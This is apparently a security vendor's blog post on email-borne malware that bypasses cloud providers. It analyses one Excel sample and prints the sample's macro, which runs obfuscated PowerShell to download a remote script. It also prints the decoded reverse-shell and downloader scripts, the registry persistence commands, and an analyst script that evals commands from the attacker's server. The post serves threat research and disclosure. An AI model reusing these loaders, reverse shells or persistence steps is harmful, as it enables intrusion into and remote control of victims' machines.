How effective is your email security stack against the constantly shifting threat landscape? To best answer this question, you must continuously measure and validate the efficacy of your defenses against the latest threats facing the users your organization defends.
InQuest came to fruition in 2013 as a network sensor platform built by SOC analysts at the Pentagon who were looking to close the end-user security gap left behind by other best-of-breed solutions. Our focus started on the threat sequence to prevent email and web-borne threats from reaching enterprise users, ultimately preventing attackers from gaining an inside foothold.
In 2021, as we looked to expand our purview to the cloud, we went back to our roots and asked ourselves, “Where’s the new gap?” Thus an experiment was born The Trystero Project.
The process for this effort is simple and straightforward:
- We harvest real-world malware from the wild and loop it through the two most popular cloud email providers, Google and Microsoft. We do this with various levels of security enabled or disabled that each provider has available by default.
- We then monitor which of those samples makes it through the security gauntlets the providers have created.
- The samples that do make it into our instrumented mailboxes are then captured and analyzed, with results being stored and shared publicly with the world.
In April alone, we harvested 444 samples capable of bypassing either Microsoft or Google. Of those, Microsoft missed 182 (41%) and Google missed 212 (48%). These real-world samples require additional security measures to ensure they cannot reach your user’s inbox.
Sample Highlight
Let’s take a look at an interesting sample that flowed through our Email Attack Simulator on May 25th. A Microsoft Office Spreadsheet containing coercive instructions designed to entice the target user into activating the embedded VBA macro. Sometimes these instructions are embedded within images, other times, like here, it’s written out plainly:

Both InQuest heuristics and machine learning models detected this sample as malicious with high confidence:

So did a large number of AV vendors, 19 of them on the initial scan on May 25th and 33 on the second scan on May 26th.

It’s quite typical for sample detection to improve over time as there is heavy sharing among the community.

The intent of the VBA macro is rather blatant, a partially obfuscated call to a remote Powershell script hosted on Microsoft-owned Github:
Sub Workbook_Open()
Set WshShell = CreateObject("WScript.Shell")
Dim x As String
x = "powershell.exe -WindowStyle hidden -noprofile (power''sh''ell.ex''e {$d = ((Invok''e-Web''Requ''est https://raw.githubusercontent.com/azdakc/gasd/main/jdsin.txt).Content); power''she''ll''.ex''e -execu''tionpol''icy bypa''ss -ec $d})"
Set WshShellExec = WshShell.Exec(x)
MsgBox("This File is not compatible with this computer architecture x64. Please contact the owner of this File")
End Sub
We can see this IOC is automatically extracted via InQuest Deep File Inspection (DFI), directly on the InQuest Labs site above:

The hosting Github account and repository were both created on May 22nd:

After decoding and deobfuscating jdsin.txt, we see the following two script bodies. This script establishes a TCP connection to the IP address 149.100.157[.]219 on port 4443. It reads commands sent over the network and executes them using Invoke-Expression (iex). The output of the executed commands is sent back over the network. Finally, the TCP connection is closed. The code is set to run in a hidden window using -WindowStyle hidden.
Start-Process $PSHOME\powershell.exe -ArgumentList {
$tcpClient = New-Object System.Net.Sockets.TCPClient('', 4443)
$stream = $tcpClient.GetStream()
[byte[]]$bytes = 0..65535 | ForEach-Object { 0 }
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$receivedData = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$output = (iex $receivedData 2>&1 | Out-String)
$prompt = $output + 'PS ' + (pwd).Path + '> '
$encodedPrompt = ([text.encoding]::ASCII).GetBytes($prompt)
$stream.Write($encodedPrompt, 0, $encodedPrompt.Length)
} -WindowStyle hidden
To complete the task, the system will retrieve a PowerShell script called hopper.ps1 from the designated URL (https://raw.githubusercontent.com/azdakc/gasd/main/hopper[.]ps1) and store it as Sys.ps1 in the user’s local AppData directory. Subsequently, it will run the downloaded script using powershell.exe, employing the -WindowStyle hidden -NoProfile -ExecutionPolicy Bypass -File parameters.
powershell.exe {
$path = 'C:\Users\' + $env:UserName + '\AppData\Local'
$name = "Sys.ps1"
$outputFile = $path + "\" + $name
Invoke-WebRequest "https://raw.githubusercontent.com/azdakc/gasd/main/hopper.ps1" -OutFile $outputFile
powershell.exe -WindowStyle hidden -NoProfile -ExecutionPolicy Bypass -File $outputFile
} -WindowStyle hidden
The second Powershell script seen here is the third stage of the malware payload:

From there, the next stage received via raw socket reading off the IP address 149.100.167[.]219 on port 4443.
Here is the decoded and deobfuscated script that was downloaded from hopper.ps1, but saved on the system as sys.ps1.
Start-Process $PSHOME\powershell.exe -ArgumentList {
$tcpClient = New-Object System.Net.Sockets.TCPClient('', 4443)
$stream = $tcpClient.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$receivedData = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$output = (iex $receivedData 2>&1 | Out-String)
$prompt = $output + 'PS ' + (pwd).Path + '> '
$encodedPrompt = ([text.encoding]::ASCII).GetBytes($prompt)
$stream.Write($encodedPrompt, 0, $encodedPrompt.Length)
} -WindowStyle hidden
powershell.exe {
$appDataFolder = 'C:\Users\' + $env:UserName + '\AppData\Local'
$command = 'powershell.exe -windowstyle hidden -noprofile -executionpolicy bypass -file ' + $appDataFolder + '\Sys.ps1'
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v SystemServices /t REG_SZ /d $command /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v SystemServices /t REG_SZ /d $command /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v SystemServices /t REG_SZ /d $command /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v SystemServices /t REG_SZ /d $command /f
} -WindowStyle hidden
Achieving persistence is a critical objective for malware authors seeking to maintain their malicious activities on compromised systems. In a recent analysis, a PowerShell script was discovered that employed modifications to specific registry keys to establish persistence. The script added values to keys such as “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce.” By appending the command “powershell.exe powershell.exe -windowstyle hidden -noprofile -executionpolicy bypass -file $sdfsf5465ewiuvxnsfk\Sys.ps1” to these registry keys, the malware ensured that the malicious script would automatically execute during user login or when certain system events occurred. This persistence mechanism allowed the script to evade detection and maintain its presence on the compromised system, emphasizing the importance of robust security measures to detect and prevent such unauthorized modifications to the Windows Registry.
The final question relates to the commands sent by the remote server and the potential payload being delivered to our victim. To investigate the behavior here, the following script will interrogate that server and record the commands that have been sent.
exec 3<>/dev/tcp/
while IFS= read -r -u 3 cmd; do
echo "$cmd" >> "$log_file"
result=$(eval "$cmd" 2>&1)
prompt="$result"$(pwd)" > "
echo -n "$prompt" >&3
exec 3>&-
echo "Command log saved to: $log_file"
After multiple iterations, the only commands received appeared to be enumeration type commands.
$ tail -f command_log.txt
echo “$(hostname)“
echo 0bf97027b0bb4e278dea970aa24d9570
At this point, speculation eludes to the ability for an attacker to specify a payload or specific actions to a host of given interest. Perhaps a replacement with:
eval “$(echo ‘dGVsbmV0IHRvd2VsLmJsaW5rZW5saWdodHMubmw=’ | base64 -d)”
